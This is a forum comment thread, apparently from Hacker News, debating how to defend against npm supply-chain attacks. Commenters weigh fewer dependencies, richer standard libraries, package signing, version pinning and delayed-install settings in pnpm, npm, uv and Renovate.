I did not say to do blind copy paste.
A few lines of code can be audited.
Sounds like the job for an LLM tool to extract what's actually used from appropriately-licensed OSS modules and paste directly into codebases.
Requiring you to audit both security and robustness on the LLM generated code.
Creating two problems, where there was one.
I didn't say generate :) - in all seriousness, I think you could reasonably have it copy the code for e.g. lodash.merge() and paste it into your codebase without the headaches you're describing. IMO, this method would be practical for a majority of npm deps in prod code. There are some I'd want to rely on the lib (and its maintenance over time), but also... a sort function is a sort function.
LLMs don't copy and paste. They ingest and generate. The output will always be a generated something.
You can give an LLM access to tools that it can invoke to actually copy and paste.
In 2022, sure. But not today. Even something as simple as generating and running a `git clone && cp xyz` command will create code not directly generated by the LLM.
In what way do you think this rebuts the message you responded to?
LLMs can do the audits now.
Do you have any evidence it wouldn't just make up code.
This is already a thing, compiled languages have been doing this for decades. This is just C++ templates with extra steps.
>> and keeping them to well-known and trustworthy (security-wise) creators.
The true threat here isn't the immediate dependency though, it's the recursive supply chain of dependencies. "trustworthy" doesn't make any sese either when the root cause is almost always someone trustworthy getting phished. Finally if I'm not capable of auditing the dependencies it's unlikely I can replace them with my own code. That's like telling a vibe coder the solution to their brittle creations is to not use AI and write the code themselves.
> Finally if I'm not capable of auditing the dependencies it's unlikely I can replace them with my own code. That's like telling a vibe coder the solution to their brittle creations is to not use AI and write the code themselves.
In both cases, actually doing the work and writing a function instead of adding a dependency or asking an AI to write it for you will probably make you a better coder and one who is better able to audit code you want to blindly trust in the future.
Just like it's going to make you a better engineer if you design the microchips in your workstation yourself instead of buying an x86 CPU.
It's still neither realistic nor helpful advice.
"A little copying is better than a little dependency" -- Go proverb (also applies to other programming languages)
IMO, one thing I like in npm packages is that that usually they are small, and they should ideally converge towards stability (frozen)...
If they are not, something is bad and the dependency should be "reduced" if at all possible.
Exactly.
I always tried to keep the dependencies to a minimum.
Another thing you can do is lock versions to a year ago (this is what linux distros do) and wait for multiple audits of something, or lack of reports in the wild, before updating.
I saw one of those word-substition browser plugins a few years back that swapped "dependency" for "liability", and it was basically never wrong.
(Big fan of version pinning in basically every context, too)
I'm re-reading all these previous comments, replacing "dependency" for "liability" in my mind, and it's being quite fun to see how well everything still keeps meaning the same, but better
> I think this is a good argument for reducing your dependency count as much as possible, and keeping them to well-known and trustworthy (security-wise) creators.
I wonder to which extent is the extreme dependency count a symptom of a standard library that is too minimalistic for the ecosystem's needs.
Perhaps this issue could be addressed by a "version set" approach to bundling stable npm packages.
I remember people in the JS crowd getting really mad at the implication that this all was pretty much inevitable, like 10/15 years ago. Can’t say they didn’t do great things since then, but it’s not like nobody saw this coming.
Easier said than done when your ecosystem of choice took the Unix philosophy of doing one thing well, misinterpreted it and then drove it off a cliff. The dependency tree of a simple Python service is incomparable to a Node service of similar complexity.
As a security guy, for years, you get laughed out of the room suggesting devs limit their dependencies and don't download half of the internet while building. You are an obstruction for making profit. And obviously reading the code does very little since modern (and especially Javascript) code just glues together frameworks and libraries, and there's no way a single human being is going to read a couple million lines of code.
There are no real solutions to the problem, except for reducing exposure somewhat by limiting yourself to a mostly frozen subset of packages that are hopefully vetted more stringently by more people.
The "solution" would be using a language with a strong standard library and then having a trusted 3rd party manually audit any approved packages.
THEN use artifactory on top of that.
That's boring and slow though. Whatever I want my packages and I want them now. Apart of the issue is the whole industry is built upon goodwill and hope.
Some 19 year old hacked together a new front end framework last week, better use it in prod because why not.
Occasionally I want to turn off my brain and just buy some shoes. The Timberland website made that nearly impossible last week. When I gave up on logging in for free shipping and just paid full price, I get an email a few days later saying they ran out of shoes.
Alright. I guess Amazon is dominant for a reason.
This is the right answer. I'm willing to stick my head out and assert that languages with a "minimal" standard library are defective by design. The argument of APIs being stuck is mood with approaches like Rust's epocs or "strict mode".
Standard libraries should include everything needed to interact with modern systems. This means HTTP parsing, HTTP requests, and JSON parsing. Some laguages are excellent (like python), while some are half way there (like go), and some are just broken (Rust).
External libraries are for niche or specialized functionality. External libraries are not for functionality that is used by most modern software. To put your head in the ground and insist otherwise is madness and will lead to ridiculous outcomes like this.
> Standard libraries should include everything needed to interact with modern systems.
This is great when the stdlib is well-designed and kept current when new standards and so on become available, but often "batteries included" approaches fail to cover all needs adequately, are slow to adopt new standards or introduce poorly designed modules that then cannot be easily changed, and/or fail to keep up-to-date with the evolution of the language.
I think the best approach is to have a stdlib of a size that can be adequately maintained/improved, then bless a number of externally developed libraries (maybe even making them available in some official "community" module or something with weaker stability guarantees than the stdlib).
I find it a bit funny that you specifically say HTTP handling and JSON are the elements required when that's only a small subset of things needed for modern systems. For instance, cryptography is something that's frequently required, and built-in modules for it often suck and are just ignored in favor of external libraries.
EDIT: actually, I think my biggest issue with what you've said is that you're comparing Python, Go, and Rust. These languages all have vastly different design considerations. In a language like Python, you basically want to be able to just bash together some code quickly that can get things working. While I might dislike it, a "batteries included" approach makes sense here. Go is somewhat similar since it's designed to take someone from no knowledge of the language to productive quickly. Including a lot in the stdlib makes sense here since it's easier to find stuff that way. While Rust can be used like Python and Go, that's not really its main purpose. It's really meant as an alternative to C++ and the various niches C/C++ have dominated for years. In a language like that, where performance is often key, I'd rather have a higher quality external library than just something shoved into the stdlib.
The tradeoff of “batteries included” vs not is real: Python developers famously reach for community libraries like requests right away to avoid using the built-in tooling.
I wasn't even aware there _was_ built-in tooling...
And yet, there are times where all I've had access to was the stdlib. I was damn glad for urllib2 at those times. It's worth it to have a batteries included stdlib, even if parts of it don't wind up being the most commonly used by the community.
The fact that there is a 'urllib2' implies that there's a 'urllib', which tells us something pretty important about the dangers of kitchen-sink standard libraries.
But nothing prevents a language to have rich and OPTIONAL stdlib, so that devs can choose different solutions without linking bunch of junk they do not use.
Really, good stdlib still allows you to use better suited 3rd party libraries. Lack of good stdlib doesn't add anything.
Related: Rust Dependencies Scare Me [1]
> This is the right answer. I'm willing to stick my head out and assert that languages with a "minimal" standard library are defective by design.
> Standard libraries should include everything needed to interact with modern systems. This means HTTP parsing, HTTP requests, and JSON parsing.
There is another way. Why not make the standard library itself pluggable? Rust has a standard library and a core library. The standard library is optional, especially for bare-metal targets.
Make the core library as light as possible, with just enough functionality to implement other libraries, including the interfaces/shims for absolutely necessary modules like allocators and basic data structures like vectors, hashmaps, etc. Then move all other stuff into the standard library. The official standard library can be minimal like the Rust standard library is now. However, we should be able to replace the official standard library with a 3rd party standard library of choice. (What I mean by standard library here is the 'base library', not the official library.) Third party standard library can be as light or as comprehensive as you might want. That also will make auditing the default codebase possible.
I don't know how realistic this is, but something similar is already there in Rust. While Rust has language features that support async programming, the actual implementation is in an external runtime like Tokio or smol. The clever bit here is that the other third party async libraries don't enforce or restrict your choice of the async runtime. The application developer can still choose whatever async runtime they want. Similarly, the 3rd party standard library must not restrict the choice of standard libraries. That means adding some interfaces in the core, as mentioned earlier.
This is the philosophy used by the Java world. Big parts of the standard library are plugin-based. For example, database access (JDBC), filesystem access (NIO), cryptography (JCA). The standard library defines the interfaces and sometimes provides a default implementation, but it can be extended or replaced.
It works well, but the downside of that approach is people complaining about how abstract things are.
That makes sense. Just adding a clarification here. I wasn't suggesting to replace the standard library with interfaces (traits in this case). I was saying that the core library/runtime should have the interfaces for the standard library to implement some bare minimum functionalities like the allocators. Their use is more or less transparent to the application and 3rd party library developers.
Meanwhile, the public API of the selected standard library need not be abstract at all. Let's say that the bare minimum functionality expected from a 3rd party standard library is the same as the official standard library. They can just reimplement the official standard library at the minimum.
> External libraries are not for functionality that is used by most modern software.
Where do you draw the line though? It seems like you mostly spend your time writing HTTP servers reading/writing JSON, but is that what everyone else also spends their time doing? You'll end up with a standard library weighing GBs, just because "most developers write HTTP servers", which doesn't sound like a better solution.
I'm willing to stick my head the other way, and say I think the languages today are too large. Instead, they should have a smaller core, and the language designed in a way that you can extend the language via libraries. Basically more languages should be inspired by Lisps and everything should be a library.
> everything should be a library.
That's exactly npm's problem, though. What everybody is avoiding to say is that you need a concept of "trusted vendors". And, for the "OSS accelerates me" business crowd, that means paying for the stuff you use.
But who would want that when you're busy chasing "market fit".
> That's exactly npm's problem, though.
I don't think that's the problem with npm. The problem with npm is that no packages are signed, at all, so it ends up trivial for hackers to push new package versions, which they obviously shouldn't be able to do.
Since Shai-Hulud scanned maintainers' computers, if the signing key was stored there too (without a password), couldn't the attackers have published signed packages?
That is, how does signing prevent publishing of malware, exactly?
> if the signing key was stored there too (without a password), couldn't the attackers have published signed packages?
Yeah, of course. Also if they hosted their private key for the signature on their public blog, anyone could use it for publishing.
But for the sake of the argument, why don't we assume people are correctly using the thing we're talking about?
In past comments I said that a quick win would be to lean on certificates; those can't easily be forged once a certificate is accepted.
How did Shai-Hulud get access to maintainers' computers?
I don't think things being libraries (modular) is at odds with a standard library.
If you have a well vetted base library, that is frequently reviewed, under goes regular security and quality checks, then you should be minimally concerned about the quality of code that goes on top.
In a well designed language, you can still export just what you need, or even replace parts of that standard library if you so choose.
This approach even handles your question: as use cases become more common, an active, invested* community (either paying or actively contributing) can add and vet modules, or remove old ones that no longer serve an active purpose.
But as soon as you find yourself "downloading the web" to get stuff done, something has probably gone horribly wrong.
IMO Python 2 was rhetorical gold standard for getting the std lib right. Mostly batteries included, but not going totally insane with it.
It's not an easy problem to solve.
Doing it the right way would create friction, developers might need to actually understand what the code is doing rather than pulling in random libraries.
Try explaining to your CTO that development will slow down to verify the entire dependency chain.
I'm more thinking C# or Java. If Microsoft or Oracle is providing a library you can hope it's safe.
You *could* have a development ecosystem called Safe C# which only comes with vetted libraries and doesn't allow anything else.
I'm sure other solutions already exist though.
Why?
This is a standard practice in most places I have worked, CI/CD only allowed to use internal repos, and libraries are only added after clearance.
Except that "clearance" invariably consists of bureaucratic rubber stamping and actually decreases security by making it harder and slower to fix newly discovered vulnerabilities.
Depends on the skills of the respective DevOps security team.
There are also tools that break CI/CD based on CVE reports from existing dependencies.
> Doing it the right way would create friction, developers might need to actually understand what the code is doing rather than pulling in random libraries.
Then let's add friction. Developers understanding code is what they should be doing.
CTOs understand the high cost of ransomware and disruption of service.
Java is around for much longer, has exactly same architecture re transitive dependencies, yet doesn't suffer from weekly attacks like these that affect half of the world. Not technically impossible, yet not happening (at least not at this scale).
If you want an actual solution, look for differences. If you somehow end up figuring out its about type of people using those, then there is no easy technical solution.
> Standard libraries should include everything needed to interact with modern systems.
So, databases? Which then begs the question, which - Postgres, MySQL, SQLite, MS SQL, etc.? And some NoSQL, because modern systems might need it.
That basically means you need to pull in everything and the kitchen sink. And freeze it in time (because of backwards compatibility). HTML, HTTP parsing, and SHA1024 are perfectly reasonable now; wait two decades, and they might be as antiquated as XML.
So what your language designers end up, is having to work on XML parsing, HTTP, JSON libraries rather than designing a language.
If JS way is madness, having everything available is another form of madness.
It is not madness. Java is a good example of rich and modular standard library. Some components of it are eventually deprecated and removed (e.g. Applets) and this process takes long enough. Its standard library does include good crypto and http client, database abstraction API (JDBC) which is implemented by database drivers etc.
Yeah, and Java was always corporately funded, and to my knowledge no one really used neither the http client nor the XML parser. You basically have a collection of dead weight libs, that people have to begrudgingly maintain.
Granted some (JDBC) more useful than the others. Although JDBC is more of an API and less of a library.
HttpClient is relatively new and getting HTTP/3 support next spring, so it’s certainly not falling into the dead weight category. You are probably confusing it with an older version from Java 1.1/1.4.
As for XML, JAXP was a common way to deal with it. Yes, there’s Xstream etc, but it doesn’t mean any of standard XML APIs are obsolete.
My favourite is java.awt.Robot
Spot on, I rather have a Python, Java,.NET,.. standard library, that may have a few warts, but works everywhere there is full compliant implementation, than playing lego, with libraries that might not even support all platforms, and be more easily open to such attacks.
Is java.util.logging.Logger not that great?
Sure, yet everyone that used it had a good night rest when Log4J exploit came to be.
slf4j is probably more common now than standard Logger, and it was a good night for those who used Logback as implementation.
>Some 19 year old hacked together a new front end framework last week, better use it in prod because why not.
The thing is, you don't have to be this undiscerning to end up with tons of packages.
Let's init a default next.js project. How many dependencies are there?
react, react-dom, next, typescript, @types/node, @types/react, @types/react-dom.
OK so 7... seems like a lot in some sense but its still missing many reasonable dependencies. Some sort of styling solution (tailwind, styled components, etc). Some sort of http client or graphql. And more. But lets just use the base dependencies as an example. Is 7 so bad? Maybe, maybe not, but you need to go deeper. How many packages are there?
55. What are they? I have no idea, go read the lock file I guess.
All of this while being pretty reasonable.
Java + Spring Boot BOM + Maven Central (signed jars) does fit the description.
I agree, it always seems to be NPM, and there's a reason for that.
I don’t recall hearing about constant supply chain attacks with CPAN
That was a different era. The velocity of change is 100x now and the expectation for public libraries to do common things is 100x higher as well.
Perl and CPAN are still a thing, much as people would like to think otherwise.
Because it's never been considered an interesting target, compared to npm's reach?
For a while CPAN was a very big deal and those packages were probably on just about every corporate network on Earth.
This comes across as not being self-aware as to why security as laughed out of rooms: I read this as you correctly identifying some risks and said only offered the false-dichotomouy of solutions of "risk" and "no risk" without talking middle grounds between the two or finding third-ways that break the dichotomy.
I could just be projecting my own bad experiences with "security" folks (in quotes as I can't speak to their qualifications). My other big gripe is when they don't recongnize UX as a vital part of security (if their solution is unsuable, it won't be used).
This is how our security lead is. "I've identified X as a vulnerability, recommended remediation is to remove it." "We literally can't." He pokes around finding obscure vulnerabilities and recommends removing business critical software, yet we don't have MFA, our servers and networking UIs are on the main VLAN accessable by anyone, we have no tools to patch third party software, and all of our root passwords are the same. We bring real security concerns to him like this, and they just get backlogged because his stupid tools he runs only detect software vulns. It's insanity.
I've been a web developer for over two decades. I have specific well-tested solutions for avoiding external JS dependencies. Despite that, I have the exact same experience as the above security guy. Most developers love adding dependencies.
[dead]
At my previous enterprise we had a saying:
Security: we put the ‘no’ in ‘innovation’.
I've always been very careful about dependencies, and freezing them to versions that are known to work well.
I was shocked when I found out that at some of the most profitable shops, most of their code is just a bunch of different third-party libraries badly cobbled together, with only a superficial understanding of how those libraries work.
Your proposed solution does not work for web applications built with node packages.
Essentials tools such as Jest add 300 packages on their own.
You already have hundreds to thousands of packages installed, fretting over a few more for that DatePicker or something is pretty much a waste of time.
Agree on the only solution being reducing dependencies.
Even more weird in the EU where things like Cyber Resilience Act mandate patching publicly known vulnerabilities. Cool, so let's just stay up2date? Supply-chain vuln goes Brrrrrr
The post you replied to suggested a real solution to the problem. It was implemented in my current org years ago (after log4j) and we have not been affected by any of the malware dependencies that has happened since.
> You are an obstruction for making profit.
This explains a lot. Really, this is the great reason of why the society is collapsing as we speak.
"There should be no DRM in phones" - "You Are An Obstruction To Making Profit".
"People should own their devices, we must not disallow custom software on it" - "YAAOTMP"
"sir, the application will weigh 2G and do almost nothing yet, should we minify it or use different framework?" - "YAAOTMP".
"Madame, this product will cost too much and require unnecessary payments" - "YAAOTMP"
Etc. etc. Like in this "Silicon Valley" comedy series. But for real, and affecting us greatly.
Death comes to corp CEO, he screams YAAOTMP, death leaves shocked. Startup CEO watches the scene. His jedi sword turns from blue to red.
Package registries should step up. They are doing some stuff but still NPM could do more.
Personally, I go further than this and just never update dependencies unless the dependency has a bug that affects my usage of it. Vulnerabilities are included.
It is insane to me how many developers update dependencies in a project regularly. You should almost never be updating dependencies, when you do it should be because it fixes a bug (including a security issue) that you have in your project, or a new feature that you need to use.
The only time this philosophy has bitten me was in an older project where I had to convince a PM who built some node project on their machine that the vulnerability warnings were not actually issues that affected our project.
Edit: because I don't want to reply to three things with the same comment - what are you using for dependencies where a) you require frequent updates and b) those updates are really hard?
Like for example, I've avoided updating node dependencies that have "vulnerabilities" because I know the vuln doesn't affect me. Rarely do I need to update to support new features because the dependency I pick has the features I need when I choose to use it (and if it only supports partial usage, you write it yourself!). If I see that a dependency frequently has bugs or breakages across updates then I stop using it, or freeze my usage of it.
Then you run the risk of drifting so much behind that when you actually have to upgrade it becomes a gargantuan task. Both ends of the scale have problems.
That's why there's an emphasis on stability. If things works fine, don't change. If you're applying security patches, don't break the API.
In NPM world, there's so much churn that it would be comical if not for the security aspects.
That's only a problem for you, the developer, though, and is merely an annoyance about time spent. And it's all stuff you had to do anyway to update--you're just doing it all at once instead of spread out over time. A supply chain malware attack is a problem for every one of your users--who will all leave you once the dust is settled--and you end up in headline news at the top of HN's front page. These problems are not comparable. One is a rough day. The other is the end of your project.
The time upgrading is not linear, it’s exponential. If it hurts, do it more often! https://martinfowler.com/bliki/FrequencyReducesDifficulty.ht...
A log4j level vulnerability happens again. Do you need 10 minutes to update? 1 hour? 1 day? 1 week? Multiple months? The more you are drifting behind on updates, the worse it gets, which also affects every one of your users, your business, and might be the end of your project.
> A log4j level vulnerability happens again. [...] The more you are drifting behind on updates, the worse it gets
That one is a funny example in this context. If you were drifting far behind on updates, so far that you were still on the obsolete log4j 1.x, you were immune to that vulnerability (log4shell). That obsolete log4j version had other known vulnerabilities, but most of them on rarely used optional components, and none of them affected basic uses of it to log to the console or disk. And even better, there were so many people using that obsolete log4j version, that a binary compatible fork quickly appeared (reload4j) which just removes the vulnerable components (and fixes everything that wasn't removed); it takes 10 minutes to update to it, or at worst 1 hour if you have to tweak your dependencies to exclude the log4j artifact.
(And then it happened again, this time with Spring (spring4shell): if you were far behind on updates, so far that you were still on the very old but still somewhat supported Java 8, you were immune to that vulnerability.)
counterpoint, if the runtime itself (nodejs) has a critical issue, you haven't updated for years, you're on an end-of-life version, and you cannot upgrade because you have dependencies that do not support the new version of the runtime, you're in for a painful day. The argument for updating often is that when you -are- exposed to a vulnerability that you need a fix for, it's a much smaller project to revert or patch that single issue.
Otherwise, I agree with the sentiment that too many people try to update the world too often. Keeping up with runtime updates as often as possible (node.js is more trusted than any given NPM module) and updating only when dependencies are no longer compatible is a better middle ground.
The same logic you used for runtimes also applies to libraries. Vulnerabilities are found in popular JS libraries all the time. The surface area is, of course, smaller than that of a runtime like Node.js, but there is still lots of potential for security issues with out-of-date libraries.
There really is no good solution other than to reduce the surface area for vulnerabilities by reducing the total amount of code you depend on (including third-party code). In practice, this means using as few dependencies as possible. If you only use one or two functions from lodash or some other helper library, you're probably better off writing or pulling in those functions directly instead.
Fully disagree. The problem is that when you do need to upgrade, either for a bug fix, security fix, or new feature that you need/want, it's a lot easier to upgrade if your last upgrade was 3 months ago than if it was 3 years ago.
This has bitten me so many times (usually at large orgs where policy is to be conservative about upgrades) that I can't even consider not upgrading all my dependencies at least once a quarter.
yeah, I typically start any substantial development work with getting things up to date so you're not building on something you'll find out is already broken when you do get around to that painful upgrade.
this seems to me to be trading one problem that might happen for one that is guaranteed: a very painful upgrade. Maybe you only do it once in a while but it will always suck.
The problem here is that there might be a bug fix or even security fix that is not backported to old versions, and you suddenly have to update to a much newer version in a short time
That works fine if you have few dependencies (obviously this is a good practice) and you have time to vet all updates and determine whether a vulnerability impacts your particular code, but that doesn’t scale if you’re a security organization at, say, a small company.
Dependency hell exists at both ends. Too quick can bite you just as much as being too slow/lazy.
The article explicitly mentions a way to do this:
Use NPM Package Cooldown Check
The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
This attack was only targeting user environments.
Having secrets in a different security context, like root/secretsuser-owned secret files only accessible by the user for certain actions (the simplest way would be eg. sudoers file white listing a precise command like git push), which would prevent arbitrary reads of secrets.
The other part of this attack, creating new github actions, is also a privilege, normal users dont need to exercise that often or unconstrained. There are certainly ways to prevent/restrict that too.
All this "was a supply chain attack" fuzz here is IMO missing the forest for the trees. Changing the security context for these two actions is easier to implement than supply chain analysis and this basic approach is more reliable than trusting the community to find a backdoor before you apply the update. Its security 101. Sure, there are post-install scripts that can attack the system but that is a whole different game.
That's a feature of stepsecurity though, it's not built-in.
This is basically what I recommended people do with windows updates back when MS gave people a choice about when/if to install them, with shorter windows for critical updates and much longer ones for low priority updates or ones that only affected things they weren't using.
And hope there isn’t some recently patched zero-day RCE exploit at the same time.
> sort of a "delayed" mode to updating my own dependencies. The idea is that when I want to update my dependencies, instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago.
For Python's uv, you can do something like:
> uv lock --exclude-newer $(date --iso -d "2 days ago")
Awesome tip, thanks!
oh that uv lock is neat, i am going to give that a go
pnpm just added this: https://pnpm.io/blog/releases/10.16
This sounds nice in theory, but does it really solve the issue? I think that if no one's installing that package then no one is noticing the malware and no one is reporting that package either. It merely slightly improves the chances that author would notice a version they didn't release, but this doesn't work if author is not particularly actively working the compromised project.
These days compromised packages are often detected automatically by software that scans all packages uploaded to npm like https://socket.dev or https://snyk.io. So I imagine it's still useful to have those services scan these packages first, before they go out to the masses.
Measures like this also aren't meant to be "final solutions" either, but stop-gaps. Slowing the spread can still be helpful when a large scale attack like this does occur. But I'm also not entirely sure how much that weighs against potentially slowing the discovery as well.
Ultimately this is still a repository problem and not a package manager one. These are merely band-aids. The responsibility lies with npm (the repository) to implement proper solutions here.
> The responsibility lies with
No, it doesn't solve the issue, but it probably helps.
And I agree that if everyone did this, it would slow down finding issues in new releases. Not really sure what to say to that... aside from the selfish idea that if I do it, but most other people don't, it won't affect me.
a long enough delay would solve the issue for account takeovers, and bold attacks like this.
It would not solve for a bad actor gaining trust over years, then contributing seemingly innocent code that contains an exploitable bug with enough plausible deniability to remain on the team after it is patched.
minimumReleaseAge is pretty good! Nice!!
I do wish there were some lists of compromised versions, that package managers could disallow from.
there's apparently an npm RFC from 2022 proposing a similar (but potentially slightly better?) solution https://github.com/npm/rfcs/issues/646
bun is also working on it: https://github.com/oven-sh/bun/issues/22679
Aren't they found quickly because people upgrade quickly?
this btw would also solve social media. if only accounts required a month waiting period before they could speak.
You can switch to the mentioned "delayed" mode if you're using pnpm. A few days ago, pnpm 10.16 introduced a minimumReleaseAge setting that delays the installation of newly released dependencies by a configurable amount of time.
> sort of a "delayed" mode
That's the secret lots of enterprises have relied on for ages. Don't be bleeding edge, let the rest of the world gineau pig the updates and listen for them to sound the alarm if something's wrong. Obviously you do still need to pay attention to the occasional, major, hot security issues and deal with them in a swift fashion.
Another good practice is to control when your updates occur - time them when it's ok to break things and your team has the bandwidth to fix things.
This is why I laughed hard when Microsoft moved to aggressively push Windows updates and the inevitable borking it did to people's computers at the worst possible times ("What's that you said? You've got a multi-million dollar deliverable pitch tomorrow and your computer won't start due to a broken graphics driver update?). At least now there's a "delay" option similar to what you described, but it still riles me that update descriptions are opaque (so you can't selectively manage risk) and you don't really have the degree of control you ought to.
pnpm just added minimum age for dependencies https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-...
From your link:
> In most cases, such attacks are discovered quickly and the malicious versions are removed from the registry within an hour.
By delaying the infected package availability (by "aging" dependencies), we're only delaying the time, and reducing samples, until it's detected. Infections that lay dormant are even more dangerous than explosives ones.
The only benefit would be if, during this freeze, repository maintainers were successfully pruning malware before it hits the fan, and the freeze would give scanners more time to finish their verification pipelines. That's not happening afaik, NPM is crazy fast going from `npm publish` to worldwide availability, scanning is insufficient by many standards.
Afaict many of these recent supply chain attacks _have_ been detected by scanners. Which ones flew under the radar for an extended period of time?
From what I can tell, even a few hours of delay for actually pulling dependencies post-publication to give security tools a chance to find it would have stopped all (?) recent attacks in their tracks.
Thank god, adopting this immediately. Next I’d like to see Go-style minimum version selection instead.
Oh brilliant. I've been meaning to start migrating my use to pnpm; this is the push I needed.
When using Go, you don't get updated indirect dependencies until you update a direct dependency. It seems like a good system, though it depends on your direct dependencies not updating too quickly.
The auto-updating behaviour dependencies because of the `^` version prefix is the root problem.
It's best to never use `^` and always specify exact version, but many maintainers apparently can't be bothered with updating their dependencies themselves so it became the default.
Maybe one approach would be to pin all dependencies, and not use any new version of a package until it reaches a certain age. That would hopefully be enough time for any issues to be discovered?
People living on the latest packages with their dependabots never made any sense to me, ADR. They trusted their system too much
If you don't review the pinned versions, it makes no difference.
Packages can still be updated, even if pinned. If a dependency of a dependency is not pinned - it can still be updated.
Use less dependencies :)
And larger dependencies that can be trusted in larger blocks. I'll bet half of a given projects dependencies are there to "gain experience with" or be able to name drop that you've used them.
Less is More.
We used to believe that. And then W3C happened.
Stick to (pin) old stable versions, don't upgrade often. Pain in the butt to deal with eventual minimum-version-dependency limitations, but you don't get the brand new releases with bugs. Once a year, get all the newest versions and figure out all the weird backwards-incompatible bugs they've introduced. Do it over the holiday season when nobody's getting anything done anyway.
If your employer paid your dependencies' verified authors to provide them licensed and signed software, you wouldn't have to rely on a free third party intermediary with a history of distributing massive amounts of malware for your security.
> One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies.
You can do it:
https://github.blog/changelog/2025-07-01-dependabot-supports...
https://docs.renovatebot.com/configuration-options/#minimumr...
https://www.stepsecurity.io/blog/introducing-the-npm-package...
> As a user of npm-hosted packages in my own projects, I'm not really sure what to do to protect myself. It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies, and so on. Even if I had the time to do that, I'm not a typescript/javascript expert, and I'm certain there are a lot of obfuscated things that an attacker could do that I wouldn't realize was embedded malware.
I think Github's Dependabot can help you here. You can also host your own little instance of DependencyTrack and keep up to date with vulnerabilities.
> One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies.
You can do this with npm (since version 6.9.0).
To only get registry deps that are over a week old:
$ npm install --before="$(date -v -7d)"
Source: Darcy Clarke - https://bsky.app/profile/darcyclarke.me/post/3lyxir2yu6k2sI like to pin specific versions in my package.json so dependencies don't change without manual steps, and use "npm ci" to install specifically the versions in package-lock.json. My CI runs "npm audit" which will raise the alarms if a vulnerability emerges in those packages. With everything essentially frozen there either is malware within it, or there is not going to be, and the age of the packages softly implies there is not.
> instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago
The problem with this approach is you need a certain number of guinea pigs on the bleeding edge or the outcome is the same (just delayed). There is no way for anyone involved to ensure that balance is maintained. Reducing your surface area is a much more effective strategy.
Not necessarily, some supply chain compromises are detected within a day by the maintainers themselves, for example by their account being taken over. It would be good to mitigate those at least.
In that specific scenario, sure; but I don't think that's a meaningful guardrail for a business.
I think it definitely couldn’t hurt. You’re right it doesn’t eliminate the threat of supply chain attacks, but it would certainly reduce them and wouldn’t require much effort to implement (either manually or via script). You’re basically giving maintainers and researchers time to identify new malware and patch or unrelease them before you’re exposed. Just make sure you still take security patches.
Rather than the user doing that "delay" installation, it would be a good idea if the package repository (i.e. NPM) actually enforced something like that.
For example, whenever a new version of a package is released, it's published to the repository but not allowed to be installed for at least 48 hours, and this gives time to any third-party observers to detect a malware early.
I recently started using npm for an application where there’s no decent alternative ecosystem.
The signal desktop app is an electron app. Presumably it has the same problem.
Does anyone know of any reasonable approaches to using npm securely?
“Reduce your transitive dependencies” is not a reasonable suggestion. It’s similar to “rewrite all the Linux kernel modules you need from scratch” or “go write a web browser”.
Most big tech companies maintain their own NPM registry that only includes approved packages. If you need a new package available in that registry you have to request it. A security team will then review that package and its deps and add it to the list of approved packages…
I would love to have something like that "in the open"…
A debian version of NPM? I've seen a lot of hates on Reddit and other places about Debian because the team focuses on stability. When you look at the project, it's almost always based on Rust or Python.
> “Reduce your transitive dependencies” is not a reasonable suggestion. It’s similar to “rewrite all the Linux kernel modules you need from scratch” or “go write a web browser”.
Oh please, do not compare writing bunch of utilities for you "app" with writing a web browser.
This is where distributed code audits come in, you audit what you can, others audit what they can, and the overlaps of many audits gives you some level of confidence in the audited code.
> I'm not really sure what to do
You need an EDR and code repo scanner. Exploring this as a technical problem of the infrastructure will accomplish. The people that create these systems are long gone and had/have huge gaps in their capabilities to stop creating these problems.
npm shrinkwrap and then check in your node_modules folder. Don't have each developer (or worse, user) individually run npm install.
It's common among grizzled software engineering veterans to say "Check in the source code to all of your dependencies, and treat it as if it were your own source code." When you do that, version upgrades are actual projects. There's a full audit trail of who did what. Every build is reproducible. You have full visibility into all code that goes into your binary, and you can run any security or code maintenance tools on all of it. You control when upgrades happen, so you don't have a critical dependency break your upcoming project.
You can use Sonatype or Artifactory as an self-hosted provider for your NPM packages that keep their own NPM repository. This way you can delay and control updates. It is common enterprise practice.
I update my deps once a year or when I specifically need to. That helps a bit. Though it upsets the security theatre peeps at work who just blindly think dependabot issues means I need to change dependencies.
I never understood the "let's always pin everything to the latest version and let's update the pinned versions every day"… what is even the point of this exercise? Might as well not pin at all.
Don't update your dependencies manually. Setup renovate to do it for you, with a delay of at least a couple of weeks, and enable vulnerability alerts so that it opens PRs for publicly known vulnerabilities without delay
https://docs.renovatebot.com/configuration-options/#minimumr...
https://docs.renovatebot.com/presets-default/#enablevulnerab...
Why was this comment downvoted? Please explain why you disagree.
I didn’t downvote, but...
Depending on a commercial service is out of the question for most open source projects.
Renovate is not commercial, it's an own source dependabot, quite more copable at that.
AGPL is a no-go for many companies (even when it's just a tool that touches your code and not a dependency you link to).
good. that's the point.
agpl is a no go for companies not intending to ever contribute anything back. good riddance.
Not you. But one would expect major cybersecurity vendors such as Crowdstrike to screen their dependencies, yet they are all over the affected list.
It looks like they actually got infected as well. So it's not only that, their security practices seem crap
>It's not feasible for me to audit every single one of my dependencies
Perhaps I’m just ignorant of web development, but why not? We do so with our desktop software.
Average .net core desktop complex app may have a dozen dependencies if it get to that point. Average npm todo list may have several thousand if not more
Lot of software has update policies like this and then also people will run a separate test environment updating to latest
Sure, and I do that whenever I can. But I'm not going to write my own react, or even my own react-hook-form. I'm not going to rewrite stripe-js. Looking through my 16 direct dependencies -- that pull in a total of 653 packages, jesus christ -- there's only one of them that I'd consider writing myself (js-cookie) in order to reduce my dependency count. The rest would be a maintenance burden that I shouldn't have to take on.
There's this defense mechanism that I don't know how it's called, but when someone takes a criticism to the extreme to complain about it being unfeasible.
Criticism: "You should shower every day"
Defense: "OH, maybe I should shower every hour, to the point where my skin dries and I can't get my work done because I'm in the shower all day."
